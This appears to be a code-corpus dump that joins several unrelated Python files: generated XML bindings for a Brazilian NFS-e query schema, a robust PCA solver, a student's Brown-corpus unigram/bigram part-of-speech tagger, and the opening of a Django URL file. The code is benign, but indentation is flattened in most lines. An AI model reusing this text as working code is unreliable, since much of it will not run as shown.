self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509Data':
obj_ = X509DataType.factory()
obj_.build(child_)
self.X509Data = obj_
obj_.original_tagname_ = 'X509Data'
# end class KeyInfoType
class X509DataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, X509Certificate=None):
self.original_tagname_ = None
self.X509Certificate = X509Certificate
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, X509DataType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if X509DataType.subclass:
return X509DataType.subclass(*args_, **kwargs_)
else:
return X509DataType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.X509Certificate is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='X509DataType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('X509DataType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509DataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='X509DataType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='X509DataType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='X509DataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509Certificate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:X509Certificate>%s</ns1:X509Certificate>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.X509Certificate), input_name='X509Certificate')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'X509Certificate':
X509Certificate_ = child_.text
X509Certificate_ = self.gds_validate_string(X509Certificate_, node, 'X509Certificate')
self.X509Certificate = X509Certificate_
# end class X509DataType
class CanonicalizationMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, CanonicalizationMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if CanonicalizationMethodType.subclass:
return CanonicalizationMethodType.subclass(*args_, **kwargs_)
else:
return CanonicalizationMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
    def hasContent_(self):
        # This type defines no child content (attributes only).
        return False
def export(self, outfile, level, namespace_='ns1:', name_='CanonicalizationMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('CanonicalizationMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='CanonicalizationMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='CanonicalizationMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='CanonicalizationMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='CanonicalizationMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class CanonicalizationMethodType
class SignatureMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureMethodType.subclass:
return SignatureMethodType.subclass(*args_, **kwargs_)
else:
return SignatureMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
    def hasContent_(self):
        # This type defines no child content (attributes only).
        return False
def export(self, outfile, level, namespace_='ns1:', name_='SignatureMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class SignatureMethodType
class DigestMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, DigestMethodType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if DigestMethodType.subclass:
return DigestMethodType.subclass(*args_, **kwargs_)
else:
return DigestMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
    def hasContent_(self):
        # This type defines no child content (attributes only).
        return False
def export(self, outfile, level, namespace_='ns1:', name_='DigestMethodType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('DigestMethodType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='DigestMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='DigestMethodType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='DigestMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='DigestMethodType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class DigestMethodType
GDSClassesMapping = {
'Signature': SignatureType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:ns1="http://localhost:8080/WsNFe2/lote"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
if sys.version_info.major == 2:
from StringIO import StringIO as IOBuffer
else:
from io import BytesIO as IOBuffer
parser = None
doc = parsexml_(IOBuffer(inString), parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:ns1="http://localhost:8080/WsNFe2/lote"')
return rootObj
def parseLiteral(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ReqConsultaNFSeRPS'
rootClass = ReqConsultaNFSeRPS
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from ReqConsultaNFSeRPS import *\n\n')
sys.stdout.write('import ReqConsultaNFSeRPS as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"CabecalhoType",
"CanonicalizationMethodType",
"DigestMethodType",
"KeyInfoType",
"ReferenceType",
"ReqConsultaNFSeRPS",
"SignatureMethodType",
"SignatureType",
"SignatureValueType",
"SignedInfoType",
"TransformType",
"TransformsType",
"X509DataType",
"tpBairroCompleto",
"tpCPFCNPJ2",
"tpChaveNFe",
"tpChaveNFeRPS",
"tpChaveRPS",
"tpChaveSubstituicaoNFSe",
"tpConsultaNFSe",
"tpDeducoes",
"tpDetalhesConsultaRPS",
"tpEndereco",
"tpEvento",
"tpInformacoesLote",
"tpItens",
"tpListaAlertas",
"tpListaDeducoes",
"tpListaDetalhesConsultaRPS",
"tpListaErros",
"tpListaItens",
"tpListaNFSe",
"tpListaNFSeConsultaNota",
"tpListaNFSeRPS",
"tpLogradouroCompleto",
"tpLote",
"tpLoteCancelamentoNFSe",
"tpLoteConsultaNFSe",
"tpNFSe",
"tpNotaCancelamentoNFSe",
"tpNotaConsultaNFSe",
"tpNotasCancelamentoNFSe",
"tpNotasConsultaNFSe",
"tpRPS",
"tpRPSConsultaNFSe",
"tpRPSsConsultaNFSe",
"tpRetornoNotasCancelamentoNFSe"
]
|
py | 1a37e7c70bb465c4c1a5cfbe663addbec99c0edf | """
Robust Principal Component Analysis
"""
import numpy as np
from numpy.linalg import norm
from numpy.linalg import svd
def rpca_alm(M, mu=None, l=None, mu_tol=1E7, tol=1E-7, max_iter=1000):
"""Matrix recovery/decomposition using Robust Principal Component Analysis
    Decompose a rectangular matrix M into a low-rank component and a sparse
    component by solving a convex minimization problem via the Augmented
    Lagrangian Method.
minimize ||A||_* + λ ||E||_1
subject to A + E = M
where ||A||_* is the nuclear norm of A (sum of singular values)
- surrogate of matrix rank
||E||_1 is the l1 norm of E (absolute values of elements)
- surrogate of matrix sparseness
Relaxed to
    L(A,E,Y,λ) := ||A||_* + λ||E||_1 + <Y, M-A-E> + µ/2 ||M-A-E||_F^2
Parameters
----------
M : array-like, shape (n_samples, n_features)
Matrix to decompose, where n_samples in the number of samples and
n_features is the number of features.
l : float (default 1/sqrt(max(m,n)), for m x n of M)
Parameter λ (lambda) of the convex problem ||A||_* + λ ||E||_1. [2]_
mu : float (default 1.25 * ||M||_2)
Parameter µ (mu) of the Augmented Lagrange Multiplier form of Principal
Component Pursuit (PCP). [2]_
    mu_tol : float >= 0 (default 1E7)
        Upper bound on the penalty parameter µ, which grows by a factor rho
        each iteration.
tol : float >= 0 (default 1E-7)
Tolerance for accuracy of matrix reconstruction of low rank and sparse
components.
max_iter : int >= 0 (default 1000)
Maximum number of iterations to perform.
Returns
-------
A : array, shape (n_samples, n_features)
Low-rank component of the matrix decomposition.
E : array, shape (n_samples, n_features)
Sparse component of the matrix decomposition.
err : float
Error of matrix reconstruction
||M-A-E||_F / ||M||_F
References
----------
.. [1] Z. Lin, M. Chen, Y. Ma. The Augmented Lagrange Multiplier Method for
Exact Recovery of Corrupted Low-Rank Matrices, arXiv:1009.5055
    .. [2] E. J. Candès, X. Li, Y. Ma, J. Wright. Robust principal
component analysis? Journal of the ACM v.58 n.11 May 2011
"""
rho = 1.5
if not mu:
mu = 1.25 * norm(M, ord=2)
if not l:
l = np.max(M.shape)**-.5
M_sign = np.sign(M)
norm_spectral = norm(M_sign, ord=2)
norm_inf = norm(M_sign, ord=np.inf)
norm_dual = np.max([norm_spectral, norm_inf * l**-1])
Y = M_sign * norm_dual**-1
A = np.zeros(M.shape)
E = np.zeros(M.shape)
err = np.inf
i = 0
    while err > tol and i < max_iter:
        # Low-rank step: singular value thresholding of M - E + Y/mu
        U, S, V = svd(M - E + Y * mu**-1, full_matrices=False)
        A = np.dot(U, np.dot(np.diag(_shrink(S, mu**-1)), V))
        # Sparse step: elementwise soft-thresholding
        E = _shrink(M - A + Y * mu**-1, l * mu**-1)
        # Dual ascent on the Lagrange multiplier
        Y = Y + mu * (M - A - E)
        err = _fro_error(M, A, E)
        mu *= rho
        mu = np.min([mu, mu_tol])
        i += 1
return A, E, err
def _fro_error(M, A, E):
"""Error of matrix reconstruction"""
return norm(M - A - E, ord='fro') * norm(M, ord='fro')**-1
def _shrink(M, t):
"""Shrinkage operator"""
return np.sign(M) * np.maximum((np.abs(M) - t), np.zeros(M.shape))
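# Minimal usage sketch (illustrative, not part of the original module):
# recover a synthetic rank-2 matrix corrupted by ~5% sparse noise. Note that
# _shrink is plain soft-thresholding, e.g. _shrink(np.array([3., -.5]), 1.)
# gives [2., -0.].
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    low_rank = np.dot(rng.randn(50, 2), rng.randn(2, 50))
    sparse = np.zeros((50, 50))
    mask = rng.rand(50, 50) < 0.05
    sparse[mask] = 10 * rng.randn(mask.sum())
    A, E, err = rpca_alm(low_rank + sparse)
    print("rank(A) =", np.linalg.matrix_rank(A), "reconstruction error =", err)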
|
py | 1a37e8e058433bcdd76efae7fcfbc51361470c8d | #PART 1 - CORPUS
import random
import time
import csv
from collections import Counter
t1=time.time()
print("Warning: This program is long, and takes some time to execute, because of the big file sizes.")
print("It took around 30s on an i7 7700HQ laptop with 16 GB of RAM. Performance might vary.")
def combine_lists(l1, l2):
return list(map(lambda x, y:"{} {}".format(x,y), l1, l2))
def givetaggivenword(some_dict):
temp_dict={}
temp=list(some_dict.values())
for a_dict in temp:
for tag in a_dict:
if tag in temp_dict:
temp_dict[tag]=temp_dict[tag]+a_dict[tag]
else:
temp_dict[tag]=a_dict[tag]
best_tag=keywithmaxval(temp_dict)
return(best_tag)
#Function to return the key having maximum value in a dictionary
def keywithmaxval(dic):
val=list(dic.values())
key=list(dic.keys())
return key[val.index(max(val))]
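#(e.g. keywithmaxval({"nn": 5, "vb": 2}) returns "nn")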
def givesingletons(arr):
freq = Counter(arr)
return [elem for elem in arr if freq[elem] == 1]
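#e.g. givesingletons(["a", "b", "a", "c"]) returns ["b", "c"]: the hapax
#legomena (words seen exactly once), used below to tag unknown words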
#MODEL SCRAPPED AS NOT ENOUGH TIME
#Function to give a tag which is calculated randomly by using the test tag set frequency as weights
# def weighted_random_tag(tag_list):
# import numpy as np
# unique_elements, counts_elements = np.unique(tag_list, return_counts=True)
# counts_elements=counts_elements/np.sum(counts_elements)
# weighted_tag=np.random.choice(unique_elements,p=counts_elements)
# return(weighted_tag)
#Open File and read brown.txt
file=open("brown.txt","r")
all_text=file.read()
file.close()
clean_text=all_text.strip()
#Get all words along with their tags
trainfile=open("brown-train.txt","w")
testfile=open("brown-test.txt","w")
all_words=clean_text.split()
all_sent=[]
sent=""
#Join words to form sentences using the following loop
i=0 #Number of sentences
for word in all_words:
if word[-2:]=="/.":
sent=sent+word+" "
all_sent.append(sent.strip())
        if len(all_sent[-1])==3: #Drop degenerate "sentences" that are a lone terminator token like "./."
# print("All sent of -2 is{}".format(all_sent[-2]))
# print("All sent of -1 is{}".format(all_sent[-1]))
# print("Current sent is{}".format(sent))
# print(all_sent[-1])
del all_sent[-1]
i=i-1
sent=""
i=i+1
continue
sent=sent+word+" "
#The first 2000 sentences of all sentences will form training set, while remaining will form test dataset
train_sent=all_sent[:2000]
test_sent=all_sent[2000:]
trainfile.write('\n'.join(train_sent))
testfile.write('\n'.join(test_sent))
#Write these training and test datasets to files
trainfile.close()
testfile.close()
print("brown-train.txt saved succesfully.")
print("brown-test.txt saved succesfully.")
#PART 2 - TAGGER IMPLEMENTATION
#Subpart 1 - Unigram
print("------------UNIGRAM------------")
#Create a nested dictionary of form {WORD1:{Tag1:Frequency,Tag2:Frequency,Tag3:Frequency...},WORD2:{Tag1:Frequency,Tag2:Frequency,Tag3:Frequency...},WORD3:{Tag1:Frequency,Tag2:Frequency,Tag3:Frequency...}...}
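#e.g. {"run": {"vb": 12, "nn": 3}, "the": {"at": 250}} (illustrative tags)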
unigram_tagger_dict={} #Nested Dictionary
unigram_list=[] #List of all unigrams
tag_list=[] #List of all tags
for sent in train_sent:
for word in sent.split():
unigram=word.rsplit("/",1)[0]
tag=word.rsplit("/",1)[1]
unigram_list.append(unigram)
tag_list.append(tag)
#A Tag Dictionary for the current word i.e for current word {Tag1,Tag2,Tag3...}
if unigram in unigram_tagger_dict:
tag_dict=unigram_tagger_dict[unigram]
else:
tag_dict={}
if tag not in tag_dict:
tag_dict[tag]=0
tag_dict[tag]=tag_dict[tag]+1
unigram_tagger_dict[unigram]=tag_dict
#Get the list of all unique unigrams and tags
unigram_set=list(set(unigram_list))
tag_set=list(set(tag_list))
max_tag_unigram_dict={}
unigramfile=open("unigram-tag.txt","w")
#Find out the most frequent tag for each word in training set and store as a dictionary
for unigram in unigram_set:
current_unigram_dict=unigram_tagger_dict[unigram]
unigram_values=list(current_unigram_dict.values())
unigram_keys=list(current_unigram_dict.keys())
max_tag=unigram_keys[unigram_values.index(max(unigram_values))]
max_tag_unigram_dict[unigram]=max_tag
#Write the dictionary to a file outside the loop to save time
unigramfile.write(str(max_tag_unigram_dict))
unigramfile.close()
print("unigram-tag.txt saved succesfully.")
#Assign the most frequent tag calculated above to all words in training set
unigramresultfile=open("unigram-results.txt","w")
unigramresult="" #String that holds all sentences after they've been tagged using unigram model
true_unigam_tag_counts=0 #To count how many assigned tags match the original correct tags
false_unigam_tag_counts=0 #To count how many assigned tags were assigned wrongly
unknown_correct=0
all_unknown={} #Dictionary of all unknown unigrams
unigram_confusion={} # { (tag1(true), tag2(model)) : freq }
hapax=givesingletons(unigram_list)
hapax_tags=[]
for elem in hapax:
hapax_tags.append(max_tag_unigram_dict[elem])
#We have multiple models to assign tags to unknown words
print("Enter model number you would like to use : 0,1 or 2 based on:")
print("Approach 0: Mark all unknowns as UNK tags")
print("Approach 1: For unknown unigrams, give them a random tag with equal prob (1/n)")
print("Approach 2: For unknown unigrams, give them a random tag where the random prob is based ONLY ON THE UNIGRAMS WHICH APPEARED ONCE in the training data set.")
inp=int(input("Enter your choice:\n"))
for sent in test_sent:
for word in sent.split():
#Extract unigram and true_tag from "unigram/true_tag"
unigram=word.rsplit("/",1)[0]
true_tag=word.rsplit("/",1)[1]
#Find out tag based on our model:
#If the current unigram is a known unigram, then assign it the tag calculated earlier
if unigram in max_tag_unigram_dict:
model_tag=max_tag_unigram_dict[unigram]
#If it's unknown, we have various strategies for that
else:
            if inp==0:
                model_tag="UNK"
            if inp==1:
                model_tag=random.choice(tag_set)
            # if inp==2: #MODEL SCRAPPED AS NOT ENOUGH TIME
            #     model_tag=weighted_random_tag(tag_list)
            if inp==2:
                model_tag=random.choice(hapax_tags)
            #Count unknown-word accuracy for every strategy, not just inp==2
            if model_tag==true_tag:
                unknown_correct+=1
            all_unknown.setdefault(unigram,0)
            all_unknown[unigram]=all_unknown[unigram]+1
unigramresult=unigramresult+"{}/{} ".format(unigram,model_tag)
#Update true and false tag counters
if true_tag==model_tag:
true_unigam_tag_counts+=1
else:
false_unigam_tag_counts+=1
#CONFUSION
unigram_confusion.setdefault((true_tag,model_tag),0)
unigram_confusion[(true_tag,model_tag)]+=1
unigramresult=unigramresult+"\n"
unigramresultfile.write(unigramresult)
unigramresultfile.close()
print("unigram-results.txt saved succesfully.")
unigram_accuracy=100*true_unigam_tag_counts/(false_unigam_tag_counts+true_unigam_tag_counts)
unknown_accuracy=100*unknown_correct/sum(all_unknown.values()) #correct unknown tokens over all unknown tokens
print("Unigram Tagger Accuracy is {}%".format(unigram_accuracy))
print("Total unknowns is {}".format(len(all_unknown)))
print("Unknown Accuracy is {}%".format(unknown_accuracy))
#all_unknown_list=list(all_unknown.keys())
#Subpart 2 - Bigram
print("------------BIGRAM------------")
next_word_list=all_words[1:]
bigram_word_list=combine_lists(all_words,next_word_list)
bigram_tagger_dict={} # Word1:{Tag1:{Possible Next Tags: Count},Tag2:{Possible Next Tags: Count}},Word2:...
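#e.g. {"bank": {"at": {"nn": 7}}} means: after a word tagged "at", "bank" was tagged "nn" 7 times (illustrative)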
bigramfile=open("bigram-tag.txt","w")
bigramtagtext="The format is:\nCurrent Word:\n\tPrevious Tag:\n\t\tNext Tag :\tFrequency\n-------------------\n"
#Order is Count(previous,next)
for i in range(len(bigram_word_list)):
bigram_4_parts=bigram_word_list[i].replace(" ","/").rsplit("/")
prev_tag=bigram_4_parts[1]
next_tag=bigram_4_parts[3]
next_word=bigram_4_parts[2]
if next_word in bigram_tagger_dict:
next_word_dict=bigram_tagger_dict[next_word]
else:
next_word_dict={}
both_tags=bigram_4_parts[1]+bigram_4_parts[3]
if prev_tag in next_word_dict:
tag_dict=next_word_dict[prev_tag]
else:
tag_dict={}
if next_tag not in tag_dict:
tag_dict[next_tag]=0
tag_dict[next_tag]=tag_dict[next_tag]+1
next_word_dict[prev_tag]=tag_dict
bigram_tagger_dict[next_word]=next_word_dict
bigramfile.write(bigramtagtext)
bigramfile.write(str(bigram_tagger_dict))
bigramfile.close()
print("bigram-tag.txt saved succesfully.")
#Calculate the most probable next tag given previous tag for current word:
bigramresultfile=open("bigram-results.txt","w")
bigramresult="" #String that holds all sentences after they've been tagged using unigram model
true_bigam_tag_counts=0 #To count how many assigned tags match the original correct tags
false_bigam_tag_counts=0 #To count how many assigned tags were assigned wrongly
unknown_correct_bigram=0
all_unknown_bigram={}
bigram_confusion={} # { (tag1(true), tag2(model)) : freq }
i=0
j=0
print("Enter model number you would like to use : 1 or 2 based on:")
print("Approach 1: For unknown words, give them a random tag with equal prob (1/n)")
print("Approach 2: For unknown words, give them a random tag where the random prob is based ONLY ON THE UNIGRAMS WHICH APPEARED ONCE in the training data set.")
inp2=int(input("Enter your choice:\n"))
starting_tag="." #Because this is a new sentence.
for sent in test_sent:
for word in sent.split():
if i==0 and j==0:
prev_tag=starting_tag
#Extract unigram and true_tag from "unigram/true_tag"
unigram=word.rsplit("/",1)[0]
true_tag=word.rsplit("/",1)[1]
if unigram in bigram_tagger_dict:
try:
bigram_model_tag=keywithmaxval(bigram_tagger_dict[unigram][prev_tag])
except Exception as e:
#WORD FOUND, BUT NO TAG FOR PREV_TAG FOR THIS WORD Unknown Model
if inp2==1:
bigram_model_tag=random.choice(tag_set)
if inp2==2:
bigram_model_tag=random.choice(hapax_tags)
#bigram_model_tag=givetaggivenword(bigram_tagger_dict[unigram])
        else:
            #WORD NOT FOUND: Unknown Model
            if inp2==1:
                bigram_model_tag=random.choice(tag_set)
            if inp2==2:
                bigram_model_tag=random.choice(hapax_tags)
            #Track unknown-word accuracy (unknown_correct_bigram was otherwise never updated)
            if bigram_model_tag==true_tag:
                unknown_correct_bigram+=1
            all_unknown_bigram.setdefault(prev_tag,0)
            all_unknown_bigram[prev_tag]=all_unknown_bigram[prev_tag]+1
bigramresult=bigramresult+"{}/{} ".format(unigram,bigram_model_tag)
if true_tag==bigram_model_tag:
true_bigam_tag_counts+=1
else:
false_bigam_tag_counts+=1
#CONFUSION
        bigram_confusion.setdefault((true_tag,bigram_model_tag),0)
        bigram_confusion[(true_tag,bigram_model_tag)]+=1
prev_tag=bigram_model_tag
j+=1
bigramresult=bigramresult+"\n"
i+=1
bigramresultfile.write(bigramresult)
bigramresultfile.close()
print("bigram-results.txt saved succesfully.")
bigram_accuracy=100*true_bigam_tag_counts/(false_bigam_tag_counts+true_bigam_tag_counts)
unknown_accuracy_bigram=100*unknown_correct_bigram/sum(all_unknown_bigram.values())
print("Bigram Tagger Accuracy is {}%".format(bigram_accuracy))
print("Total unknowns is {}".format(len(all_unknown_bigram)))
print("Unknown Accuracy is {}%".format(unknown_accuracy_bigram))
print("------------CONFUSION MATRICES------------")
#A part of the below code has been re-used from my earlier assignment https://github.com/AKnightWing/bigram/blob/master/comp_ling.py
#Unigram Tagger Confusion Matrix
#Normalise both confusion dictionaries
for key in unigram_confusion:
unigram_confusion[key]=100*unigram_confusion[key]/false_unigam_tag_counts
for key in bigram_confusion:
bigram_confusion[key]=100*bigram_confusion[key]/false_bigam_tag_counts
firstrow=[' '] #The first row in the 2D list
for key in tag_set:
firstrow.append(key)
unigram_matrix=[] #A n*n 2D list which stores only the skeleton of the matrix
for i in range(len(tag_set)+1):
if i==0:
unigram_matrix.append(firstrow)
else:
row=[]
for j in range(len(tag_set)+1):
if j==0:
row.append(firstrow[i])
else:
try:
                    row.append(unigram_confusion[(tag_set[i-1],tag_set[j-1])])
except Exception as e:
row.append("0")
unigram_matrix.append(row)
bigram_matrix=[]
for i in range(len(tag_set)+1):
if i==0:
bigram_matrix.append(firstrow)
else:
row=[]
for j in range(len(tag_set)+1):
if j==0:
row.append(firstrow[i])
else:
try:
                    row.append(bigram_confusion[(tag_set[i-1],tag_set[j-1])])
except Exception as e:
row.append("0")
bigram_matrix.append(row)
with open('unigram_confusion.csv', 'w') as writeFile:
writer = csv.writer(writeFile)
writer.writerows(unigram_matrix)
writeFile.close()
print("unigram_confusion.csv saved succesfully.")
with open('bigram_confusion.csv', 'w') as writeFile2:
writer = csv.writer(writeFile2)
writer.writerows(bigram_matrix)
writeFile2.close()
print("bigram_confusion.csv saved succesfully.")
t2=time.time()
print("Total time taken by program = {} seconds".format(t2-t1)) |
py | 1a37e9843a2b361d5920ac4fb0e48d5b70693dbf | """tnapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
